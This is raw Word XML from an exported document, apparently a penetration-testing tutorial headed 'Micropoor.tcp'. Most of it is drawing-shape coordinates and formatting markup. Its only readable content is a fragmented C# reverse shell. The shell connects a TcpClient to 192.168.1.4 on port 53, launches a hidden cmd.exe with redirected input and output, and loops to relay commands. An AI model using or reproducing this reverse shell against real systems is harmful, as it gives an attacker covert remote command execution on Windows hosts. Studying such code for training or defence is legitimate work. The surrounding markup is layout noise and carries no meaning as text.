387,13172,6387,13172,6387,13172,6387,13173,6387,13173,6387,13173,6387,13174,6387,13174,6387,13174,6387,13175,6387,13175,6387,13176,6387,13176,6387,13177,6387,13177,6387,13178,6387,13178,6387,13179,6387,13180,6387,13180,6387,13181,6387,13182,6387,13183,6387,13184,6387,13184,6387,13185,6387,13186,6387,13187,6387,13188,6387,13190,6387,13191,6387,13192,6387,13193,6387,13194,6387,13196,6387,13197,6387,13199,6387,13200,6387,13202,6387,13203,6387,13205,6387,13207,6387,13208,6387,13210,6387,13212,6387,13214,6387,13216,6387,13218,6387,13220,6387,13223,6387,13225,6387,13227,6387,13230,6387,13232,6387,13235,6387,13237,6387,13240,6387,13242,6387,13245,6387,13248,6387,13251,6387,13254,6387,13257,6387,13260,6387,13264,6387,13267,6387,13270,6387,13274,6387,13277,6387,13281,6387,13285,6387,13289,6387,13292,6387,13296,6387,13300,6387,13305,6387,13309,6387,13313,6387,13318,6387,13322,6387,13327,6387,13331,6387,13336,6387,13341,6387,13346,6387,13351,6387,13356,6387,13361,6387,13367,6387,13372,6387,13378,6387,13383,6387,13389,6387,13395,6387,13401,6387,13407,6387,13413,6387,13419,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6387,13426,6386,13426,6386,13426,6386,13426,6386,13426,6386,13426,6386,13426,6386,13426,6385,13426,6385,13426,6385,13426,6385,13426,6385,13426,6384,13426,6384,13426,6384,13426,6384,13426,6383,13426,6383,13426,6383,13426,6382,13426,6382,13426,6382,13426,6381,13426,6381,13426,6380,13426,6380,13426,6379,13426,6379,13426,6378,13426,6378,13426,6377,13426,6377,13426,6376,13426,6375,13426,6375,13426,6374,13426,6373,13426,6373,13426,6372,13426,6371,13426,6370,13426,6369,13426,6369,13426,6368,13426,6367,13426,6366,13426,6365,13426,6364,13426,6363,13426,6362,13426,6361,13426,6360,13426,6358,13426,6357,13426,6356,13426,6355,13426,6353,13426,6352,13426,6351,13426,6349,13426,6348,13426,6346,13426,6345,13426,6343,13426,6342,13426,6340,13426,6339,13426,6337,13426,6335,13426,6334,13426,6332,13426,6330,13426,6328,13426,6326,13426,6324,13426,6322,13426,6320,13426,6318,13426,6316,13426,6314,13426,6312,13426,6309,13426,6307,13426,6305,13426,6302,13426,6300,13426,6297,13426,6295,13426,6292,13426,6290,13426,6287,13426,6284,13426,6282,13426,6279,13426,6276,13426,6273,13426,6270,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13426,6267,13425,6267,13425,6267,13425,6267,13425,6267,13425,6267,13425,6267,13425,6267,13425,6267,13424,6267,13424,6267,13424,6267,13424,6267,13423,6267,13423,6267,13423,6267,13422,6267,13422,6267,13422,6267,13421,6267,13421,6267,13420,6267,13420,6267,13419,6267,13419,6267,13418,6267,13417,6267,13417,6267,13416,6267,13415,6267,13415,6267,13414,6267,13413,6267,13412,6267,13411,6267,13410,6267,13409,6267,13408,6267,13407,6267,13406,6267,13404,6267,13403,6267,13402,6267,13401,6267,13399,6267,13398,6267,13396,6267,13395,6267,13393,6267,13391,6267,13390,6267,13388,6267,13386,6267,13384,6267,13382,6267,13380,6267,13378,6267,13376,6267,13374,6267,13372,6267,13369,6267,13367,6267,13364,6267,13362,6267,13359,6267,13357,6267,13354,6267,13351,6267,13348,6267,13345,6267,13342,6267,13339,6267,13336,6267,13333,6267,13329,6267,13326,6267,13323,6267,13319,6267,13315,6267,13312,6267,13308,6267,13304,6267,13300,6267,13296,6267,13292,6267,13288,6267,13283,6267,13279,6267,13274,6267,13270,6267,13265,6267,13260,6267,13255,6267,13251,6267,13245,6267,13240,6267,13235,6267,13230,6267,13224,6267,13219,6267,13213,6267,13207,6267,13201,6267,13196,6267,13189,6267,13183,6267,13177,6267,13171e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:234.500pt;margin-top:675.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4690,13510" coordsize="130,270">
        <v:shape style="position:absolute;left:4690;top:13510;width:130;height:270" coordorigin="4690,13510" coordsize="130,270" path="m4706,13531l4706,13531,4706,13531,4706,13531,4706,13531,4706,13531,4706,13531,4706,13531,4706,13531,4706,13531,4706,13531,4706,13531,4706,13531,4706,13531,4707,13531,4707,13531,4707,13531,4707,13531,4707,13531,4707,13531,4707,13531,4707,13531,4707,13531,4707,13531,4707,13531,4707,13531,4707,13531,4708,13531,4708,13531,4708,13531,4708,13531,4708,13531,4708,13531,4709,13531,4709,13531,4709,13531,4709,13531,4710,13531,4710,13531,4710,13531,4711,13531,4711,13531,4711,13531,4712,13531,4712,13531,4712,13531,4713,13531,4713,13531,4714,13531,4714,13531,4715,13531,4715,13531,4716,13531,4716,13531,4717,13531,4718,13531,4718,13531,4719,13531,4720,13531,4720,13531,4721,13531,4722,13531,4723,13531,4723,13531,4724,13531,4725,13531,4726,13531,4727,13531,4728,13531,4729,13531,4730,13531,4731,13531,4732,13531,4733,13531,4734,13531,4735,13531,4736,13531,4738,13531,4739,13531,4740,13531,4741,13531,4743,13531,4744,13531,4746,13531,4747,13531,4749,13531,4750,13531,4752,13531,4753,13531,4755,13531,4757,13531,4758,13531,4760,13531,4762,13531,4764,13531,4766,13531,4767,13531,4769,13531,4771,13531,4773,13531,4776,13531,4778,13531,4780,13531,4782,13531,4784,13531,4787,13531,4789,13531,4791,13531,4794,13531,4796,13531,4799,13531,4801,13531,4804,13531,4806,13531,4809,13531,4812,13531,4815,13531,4818,13531,4820,13531,4823,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13532,4826,13532,4826,13532,4826,13532,4826,13532,4826,13532,4826,13533,4826,13533,4826,13533,4826,13533,4826,13534,4826,13534,4826,13535,4826,13535,4826,13535,4826,13536,4826,13536,4826,13537,4826,13537,4826,13538,4826,13538,4826,13539,4826,13540,4826,13541,4826,13541,4826,13542,4826,13543,4826,13544,4826,13545,4826,13546,4826,13547,4826,13548,4826,13549,4826,13550,4826,13551,4826,13552,4826,13553,4826,13555,4826,13556,4826,13557,4826,13559,4826,13560,4826,13562,4826,13564,4826,13565,4826,13567,4826,13569,4826,13571,4826,13572,4826,13574,4826,13576,4826,13578,4826,13581,4826,13583,4826,13585,4826,13587,4826,13590,4826,13592,4826,13595,4826,13597,4826,13600,4826,13603,4826,13605,4826,13608,4826,13611,4826,13614,4826,13617,4826,13621,4826,13624,4826,13627,4826,13631,4826,13634,4826,13638,4826,13641,4826,13645,4826,13649,4826,13653,4826,13657,4826,13661,4826,13665,4826,13669,4826,13673,4826,13678,4826,13682,4826,13687,4826,13691,4826,13696,4826,13701,4826,13706,4826,13711,4826,13716,4826,13722,4826,13727,4826,13732,4826,13738,4826,13744,4826,13749,4826,13755,4826,13761,4826,13767,4826,13773,4826,13780,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4825,13786,4825,13786,4825,13786,4825,13786,4825,13786,4825,13786,4825,13786,4824,13786,4824,13786,4824,13786,4824,13786,4823,13786,4823,13786,4823,13786,4823,13786,4822,13786,4822,13786,4822,13786,4821,13786,4821,13786,4820,13786,4820,13786,4819,13786,4819,13786,4819,13786,4818,13786,4818,13786,4817,13786,4816,13786,4816,13786,4815,13786,4815,13786,4814,13786,4813,13786,4813,13786,4812,13786,4811,13786,4810,13786,4809,13786,4809,13786,4808,13786,4807,13786,4806,13786,4805,13786,4804,13786,4803,13786,4802,13786,4801,13786,4800,13786,4799,13786,4798,13786,4796,13786,4795,13786,4794,13786,4793,13786,4791,13786,4790,13786,4789,13786,4787,13786,4786,13786,4784,13786,4783,13786,4781,13786,4780,13786,4778,13786,4776,13786,4774,13786,4773,13786,4771,13786,4769,13786,4767,13786,4765,13786,4763,13786,4761,13786,4759,13786,4757,13786,4755,13786,4753,13786,4751,13786,4749,13786,4746,13786,4744,13786,4742,13786,4739,13786,4737,13786,4734,13786,4732,13786,4729,13786,4726,13786,4724,13786,4721,13786,4718,13786,4715,13786,4712,13786,4709,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13786,4706,13785,4706,13785,4706,13785,4706,13785,4706,13785,4706,13785,4706,13785,4706,13784,4706,13784,4706,13784,4706,13784,4706,13783,4706,13783,4706,13783,4706,13782,4706,13782,4706,13781,4706,13781,4706,13781,4706,13780,4706,13779,4706,13779,4706,13778,4706,13778,4706,13777,4706,13776,4706,13776,4706,13775,4706,13774,4706,13773,4706,13772,4706,13771,4706,13770,4706,13769,4706,13768,4706,13767,4706,13766,4706,13765,4706,13763,4706,13762,4706,13761,4706,13759,4706,13758,4706,13756,4706,13755,4706,13753,4706,13752,4706,13750,4706,13748,4706,13746,4706,13744,4706,13742,4706,13740,4706,13738,4706,13736,4706,13734,4706,13732,4706,13729,4706,13727,4706,13725,4706,13722,4706,13719,4706,13717,4706,13714,4706,13711,4706,13708,4706,13705,4706,13702,4706,13699,4706,13696,4706,13693,4706,13690,4706,13686,4706,13683,4706,13679,4706,13676,4706,13672,4706,13668,4706,13664,4706,13660,4706,13656,4706,13652,4706,13648,4706,13643,4706,13639,4706,13635,4706,13630,4706,13625,4706,13621,4706,13616,4706,13611,4706,13606,4706,13600,4706,13595,4706,13590,4706,13584,4706,13579,4706,13573,4706,13567,4706,13562,4706,13556,4706,13550,4706,13543,4706,13537,4706,13531e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:240.500pt;margin-top:675.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4810,13510" coordsize="130,270">
        <v:shape style="position:absolute;left:4810;top:13510;width:130;height:270" coordorigin="4810,13510" coordsize="130,270" path="m4826,13531l4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4826,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4827,13531,4828,13531,4828,13531,4828,13531,4828,13531,4828,13531,4828,13531,4829,13531,4829,13531,4829,13531,4829,13531,4829,13531,4830,13531,4830,13531,4830,13531,4831,13531,4831,13531,4831,13531,4832,13531,4832,13531,4833,13531,4833,13531,4833,13531,4834,13531,4834,13531,4835,13531,4835,13531,4836,13531,4836,13531,4837,13531,4838,13531,4838,13531,4839,13531,4840,13531,4840,13531,4841,13531,4842,13531,4843,13531,4843,13531,4844,13531,4845,13531,4846,13531,4847,13531,4848,13531,4849,13531,4850,13531,4851,13531,4852,13531,4853,13531,4854,13531,4855,13531,4856,13531,4858,13531,4859,13531,4860,13531,4862,13531,4863,13531,4864,13531,4866,13531,4867,13531,4869,13531,4870,13531,4872,13531,4873,13531,4875,13531,4877,13531,4878,13531,4880,13531,4882,13531,4884,13531,4886,13531,4888,13531,4889,13531,4891,13531,4893,13531,4896,13531,4898,13531,4900,13531,4902,13531,4904,13531,4907,13531,4909,13531,4911,13531,4914,13531,4916,13531,4919,13531,4921,13531,4924,13531,4927,13531,4929,13531,4932,13531,4935,13531,4938,13531,4941,13531,4943,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13531,4946,13532,4946,13532,4946,13532,4946,13532,4946,13532,4946,13532,4946,13533,4946,13533,4946,13533,4946,13533,4946,13534,4946,13534,4946,13535,4946,13535,4946,13535,4946,13536,4946,13536,4946,13537,4946,13537,4946,13538,4946,13538,4946,13539,4946,13540,4946,13541,4946,13541,4946,13542,4946,13543,4946,13544,4946,13545,4946,13546,4946,13547,4946,13548,4946,13549,4946,13550,4946,13551,4946,13552,4946,13553,4946,13555,4946,13556,4946,13557,4946,13559,4946,13560,4946,13562,4946,13564,4946,13565,4946,13567,4946,13569,4946,13571,4946,13572,4946,13574,4946,13576,4946,13578,4946,13581,4946,13583,4946,13585,4946,13587,4946,13590,4946,13592,4946,13595,4946,13597,4946,13600,4946,13603,4946,13605,4946,13608,4946,13611,4946,13614,4946,13617,4946,13621,4946,13624,4946,13627,4946,13631,4946,13634,4946,13638,4946,13641,4946,13645,4946,13649,4946,13653,4946,13657,4946,13661,4946,13665,4946,13669,4946,13673,4946,13678,4946,13682,4946,13687,4946,13691,4946,13696,4946,13701,4946,13706,4946,13711,4946,13716,4946,13722,4946,13727,4946,13732,4946,13738,4946,13744,4946,13749,4946,13755,4946,13761,4946,13767,4946,13773,4946,13780,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4946,13786,4945,13786,4945,13786,4945,13786,4945,13786,4945,13786,4945,13786,4944,13786,4944,13786,4944,13786,4944,13786,4943,13786,4943,13786,4943,13786,4943,13786,4942,13786,4942,13786,4942,13786,4941,13786,4941,13786,4940,13786,4940,13786,4940,13786,4939,13786,4939,13786,4938,13786,4938,13786,4937,13786,4936,13786,4936,13786,4935,13786,4935,13786,4934,13786,4933,13786,4933,13786,4932,13786,4931,13786,4930,13786,4930,13786,4929,13786,4928,13786,4927,13786,4926,13786,4925,13786,4924,13786,4923,13786,4922,13786,4921,13786,4920,13786,4919,13786,4918,13786,4916,13786,4915,13786,4914,13786,4913,13786,4911,13786,4910,13786,4909,13786,4907,13786,4906,13786,4904,13786,4903,13786,4901,13786,4900,13786,4898,13786,4896,13786,4895,13786,4893,13786,4891,13786,4889,13786,4887,13786,4885,13786,4883,13786,4881,13786,4879,13786,4877,13786,4875,13786,4873,13786,4871,13786,4869,13786,4866,13786,4864,13786,4862,13786,4859,13786,4857,13786,4854,13786,4852,13786,4849,13786,4846,13786,4844,13786,4841,13786,4838,13786,4835,13786,4832,13786,4829,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13786,4826,13785,4826,13785,4826,13785,4826,13785,4826,13785,4826,13785,4826,13785,4826,13784,4826,13784,4826,13784,4826,13784,4826,13783,4826,13783,4826,13783,4826,13782,4826,13782,4826,13781,4826,13781,4826,13781,4826,13780,4826,13779,4826,13779,4826,13778,4826,13778,4826,13777,4826,13776,4826,13776,4826,13775,4826,13774,4826,13773,4826,13772,4826,13771,4826,13770,4826,13769,4826,13768,4826,13767,4826,13766,4826,13765,4826,13763,4826,13762,4826,13761,4826,13759,4826,13758,4826,13756,4826,13755,4826,13753,4826,13752,4826,13750,4826,13748,4826,13746,4826,13744,4826,13742,4826,13740,4826,13738,4826,13736,4826,13734,4826,13732,4826,13729,4826,13727,4826,13725,4826,13722,4826,13719,4826,13717,4826,13714,4826,13711,4826,13708,4826,13705,4826,13702,4826,13699,4826,13696,4826,13693,4826,13690,4826,13686,4826,13683,4826,13679,4826,13676,4826,13672,4826,13668,4826,13664,4826,13660,4826,13656,4826,13652,4826,13648,4826,13643,4826,13639,4826,13635,4826,13630,4826,13625,4826,13621,4826,13616,4826,13611,4826,13606,4826,13600,4826,13595,4826,13590,4826,13584,4826,13579,4826,13573,4826,13567,4826,13562,4826,13556,4826,13550,4826,13543,4826,13537,4826,1353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6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>icropoor.tcp：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Text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IO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Diagnostics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ComponentModel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Net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Net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Sockets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587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Workflow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Activities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9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class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Program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SequentialWorkflowActivity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5661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StreamWriter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streamWriter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Program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using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TcpClient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client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TcpClient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"192.168.1.4"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53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using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stream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client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GetStream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using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StreamReader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rdr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StreamReader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4821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streamWriter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StreamWriter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23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="58" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="422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StringBuilder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strInput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StringBuilder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Process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Process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StartInfo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FileName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"cmd.exe"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StartInfo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CreateNoWindow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true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StartInfo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UseShellExecute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false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StartInfo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RedirectStandardOutput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20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true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StartInfo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RedirectStandardInput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20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true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StartInfo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RedirectStandardError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20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true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;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5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OutputDataReceived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15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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DataReceivedEventHandler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="2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CmdOutputDataHan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dler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0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Start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6742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BeginOutputReadLine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36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37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0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>while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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>true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556.505pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,11130">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:11130" coordorigin="10402,0" coordsize="0,11130" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,4,10402,6,10402,8,10402,11,10402,14,10402,18,10402,22,10402,27,10402,32,10402,38,10402,45,10402,52,10402,61,10402,70,10402,80,10402,91,10402,103,10402,116,10402,130,10402,144,10402,161,10402,178,10402,196,10402,216,10402,237,10402,259,10402,283,10402,308,10402,334,10402,362,10402,391,10402,422,10402,455,10402,489,10402,525,10402,562,10402,601,10402,642,10402,685,10402,730,10402,777,10402,825,10402,876,10402,928,10402,983,10402,1040,10402,1098,10402,1159,10402,1223,10402,1288,10402,1356,10402,1426,10402,1499,10402,1574,10402,1651,10402,1731,10402,1813,10402,1898,10402,1986,10402,2076,10402,2169,10402,2265,10402,2363,10402,2465,10402,2569,10402,2676,10402,2786,10402,2899,10402,3015,10402,3134,10402,3256,10402,3381,10402,3510,10402,3641,10402,3776,10402,3914,10402,4056,10402,4201,10402,4349,10402,4500,10402,4656,10402,4814,10402,4977,10402,5143,10402,5312,10402,5485,10402,5662,10402,5843,10402,6028,10402,6216,10402,6408,10402,6604,10402,6804,10402,7009,10402,7217,10402,7429,10402,7645,10402,7866,10402,8091,10402,8320,10402,8553,10402,8790,10402,9032,10402,9279,10402,9530,10402,9785,10402,10045,10402,10309,10402,10578,10402,10851,10402,11130e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:370" coordorigin="1490,990" coordsize="8990,3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1000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1000l1517,1000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8.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2090" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:2090;width:8990;height:370" coordorigin="1490,2090" coordsize="8990,37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3,10484,2114,10484,2114,10484,2115,10484,2115,10484,2116,10484,2116,10484,2117,10484,2118,10484,2118,10484,2119,10484,2120,10484,2121,10484,2122,10484,2123,10484,2124,10484,2125,10484,2126,10484,2127,10484,2128,10484,2130,10484,2131,10484,2132,10484,2134,10484,2135,10484,2137,10484,2138,10484,2140,10484,2142,10484,2144,10484,2146,10484,2148,10484,2150,10484,2152,10484,2154,10484,2156,10484,2159,10484,2161,10484,2164,10484,2166,10484,2169,10484,2172,10484,2174,10484,2177,10484,2180,10484,2183,10484,2187,10484,2190,10484,2193,10484,2197,10484,2200,10484,2204,10484,2208,10484,2211,10484,2215,10484,2219,10484,2224,10484,2228,10484,2232,10484,2237,10484,2241,10484,2246,10484,2251,10484,2256,10484,2261,10484,2266,10484,2271,10484,2276,10484,2282,10484,2288,10484,2293,10484,2299,10484,2305,10484,2311,10484,2317,10484,2324,10484,2330,10484,2337,10484,2344,10484,2350,10484,2357,10484,2365,10484,2372,10484,2379,10484,2387,10484,2395,10484,2402,10484,2410,10484,2418,10484,2427,10484,2435,10484,2444,10484,2452,10484,2461,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10483,2470,10482,2470,10482,2470,10480,2470,10479,2470,10477,2470,10475,2470,10473,2470,10470,2470,10466,2470,10462,2470,10458,2470,10453,2470,10448,2470,10442,2470,10435,2470,10428,2470,10419,2470,10411,2470,10401,2470,10391,2470,10379,2470,10367,2470,10354,2470,10340,2470,10326,2470,10310,2470,10293,2470,10275,2470,10256,2470,10236,2470,10215,2470,10192,2470,10168,2470,10143,2470,10117,2470,10090,2470,10061,2470,10031,2470,9999,2470,9966,2470,9931,2470,9895,2470,9858,2470,9819,2470,9778,2470,9735,2470,9691,2470,9646,2470,9598,2470,9549,2470,9498,2470,9445,2470,9391,2470,9334,2470,9275,2470,9215,2470,9153,2470,9088,2470,9022,2470,8953,2470,8883,2470,8810,2470,8735,2470,8658,2470,8578,2470,8497,2470,8413,2470,8326,2470,8238,2470,8146,2470,8053,2470,7957,2470,7859,2470,7758,2470,7654,2470,7548,2470,7439,2470,7328,2470,7214,2470,7097,2470,6977,2470,6855,2470,6730,2470,6602,2470,6471,2470,6337,2470,6201,2470,6061,2470,5918,2470,5773,2470,5624,2470,5472,2470,5317,2470,5159,2470,4997,2470,4833,2470,4665,2470,4494,2470,4319,2470,4141,2470,3960,2470,3776,2470,3587,2470,3396,2470,3201,2470,3002,2470,2800,2470,2594,2470,2385,2470,2172,2470,1955,2470,1734,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2469,1510,2469,1510,2469,1510,2469,1510,2469,1510,2468,1510,2468,1510,2468,1510,2467,1510,2467,1510,2466,1510,2466,1510,2466,1510,2465,1510,2464,1510,2464,1510,2463,1510,2463,1510,2462,1510,2461,1510,2460,1510,2459,1510,2459,1510,2458,1510,2457,1510,2456,1510,2454,1510,2453,1510,2452,1510,2451,1510,2449,1510,2448,1510,2447,1510,2445,1510,2444,1510,2442,1510,2440,1510,2438,1510,2437,1510,2435,1510,2433,1510,2431,1510,2429,1510,2426,1510,2424,1510,2422,1510,2419,1510,2417,1510,2414,1510,2412,1510,2409,1510,2406,1510,2403,1510,2400,1510,2397,1510,2394,1510,2390,1510,2387,1510,2384,1510,2380,1510,2376,1510,2373,1510,2369,1510,2365,1510,2361,1510,2357,1510,2352,1510,2348,1510,2344,1510,2339,1510,2334,1510,2329,1510,2325,1510,2320,1510,2314,1510,2309,1510,2304,1510,2298,1510,2293,1510,2287,1510,2281,1510,2275,1510,2269,1510,2263,1510,2257,1510,2250,1510,2243,1510,2237,1510,2230,1510,2223,1510,2216,1510,2208,1510,2201,1510,2193,1510,2186,1510,2178,1510,2170,1510,2162,1510,2154,1510,2145,1510,2137,1510,2128,1510,2119,1510,2110e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:104.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2090" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:2090;width:30;height:370" coordorigin="1490,2090" coordsize="30,370" path="m1517,2110l1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2111,1517,2111,1517,2111,1517,2111,1517,2111,1517,2111,1517,2112,1517,2112,1517,2112,1517,2112,1517,2113,1517,2113,1517,2113,1517,2114,1517,2114,1517,2115,1517,2115,1517,2116,1517,2116,1517,2117,1517,2118,1517,2118,1517,2119,1517,2120,1517,2121,1517,2122,1517,2123,1517,2124,1517,2125,1517,2126,1517,2127,1517,2128,1517,2130,1517,2131,1517,2132,1517,2134,1517,2135,1517,2137,1517,2138,1517,2140,1517,2142,1517,2144,1517,2146,1517,2148,1517,2150,1517,2152,1517,2154,1517,2156,1517,2159,1517,2161,1517,2164,1517,2166,1517,2169,1517,2172,1517,2174,1517,2177,1517,2180,1517,2183,1517,2187,1517,2190,1517,2193,1517,2197,1517,2200,1517,2204,1517,2208,1517,2211,1517,2215,1517,2219,1517,2224,1517,2228,1517,2232,1517,2237,1517,2241,1517,2246,1517,2251,1517,2256,1517,2261,1517,2266,1517,2271,1517,2276,1517,2282,1517,2288,1517,2293,1517,2299,1517,2305,1517,2311,1517,2317,1517,2324,1517,2330,1517,2337,1517,2344,1517,2350,1517,2357,1517,2365,1517,2372,1517,2379,1517,2387,1517,2395,1517,2402,1517,2410,1517,2418,1517,2427,1517,2435,1517,2444,1517,2452,1517,2461,1517,2470e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:122.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2450" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:2450;width:8990;height:390" coordorigin="1490,2450" coordsize="8990,390" path="m1510,2470l1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1511,2470,1512,2470,1512,2470,1514,2470,1515,2470,1517,2470,1519,2470,1521,2470,1524,2470,1528,2470,1532,2470,1536,2470,1541,2470,1546,2470,1552,2470,1559,2470,1566,2470,1575,2470,1583,2470,1593,2470,1603,2470,1615,2470,1627,2470,1640,2470,1654,2470,1668,2470,1684,2470,1701,2470,1719,2470,1738,2470,1758,2470,1780,2470,1802,2470,1826,2470,1851,2470,1877,2470,1904,2470,1933,2470,1963,2470,1995,2470,2028,2470,2063,2470,2099,2470,2136,2470,2175,2470,2216,2470,2259,2470,2303,2470,2348,2470,2396,2470,2445,2470,2496,2470,2549,2470,2604,2470,2660,2470,2719,2470,2779,2470,2841,2470,2906,2470,2972,2470,3041,2470,3112,2470,3184,2470,3259,2470,3336,2470,3416,2470,3498,2470,3582,2470,3668,2470,3757,2470,3848,2470,3941,2470,4037,2470,4136,2470,4236,2470,4340,2470,4446,2470,4555,2470,4666,2470,4780,2470,4897,2470,5017,2470,5139,2470,5264,2470,5392,2470,5523,2470,5657,2470,5793,2470,5933,2470,6076,2470,6222,2470,6370,2470,6522,2470,6677,2470,6835,2470,6997,2470,7161,2470,7329,2470,7500,2470,7675,2470,7853,2470,8034,2470,8219,2470,8407,2470,8598,2470,8793,2470,8992,2470,9194,2470,9400,2470,9609,2470,9823,2470,10039,2470,10260,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2471,10484,2471,10484,2471,10484,2471,10484,2471,10484,2471,10484,2471,10484,2472,10484,2472,10484,2472,10484,2472,10484,2473,10484,2473,10484,2473,10484,2474,10484,2474,10484,2475,10484,2475,10484,2476,10484,2476,10484,2477,10484,2478,10484,2478,10484,2479,10484,2480,10484,2481,10484,2482,10484,2482,10484,2483,10484,2484,10484,2486,10484,2487,10484,2488,10484,2489,10484,2491,10484,2492,10484,2493,10484,2495,10484,2496,10484,2498,10484,2500,10484,2502,10484,2503,10484,2505,10484,2507,10484,2509,10484,2511,10484,2514,10484,2516,10484,2518,10484,2521,10484,2523,10484,2526,10484,2529,10484,2531,10484,2534,10484,2537,10484,2540,10484,2543,10484,2547,10484,2550,10484,2553,10484,2557,10484,2560,10484,2564,10484,2568,10484,2572,10484,2576,10484,2580,10484,2584,10484,2589,10484,2593,10484,2598,10484,2602,10484,2607,10484,2612,10484,2617,10484,2622,10484,2627,10484,2633,10484,2638,10484,2644,10484,2649,10484,2655,10484,2661,10484,2667,10484,2673,10484,2680,10484,2686,10484,2693,10484,2700,10484,2707,10484,2714,10484,2721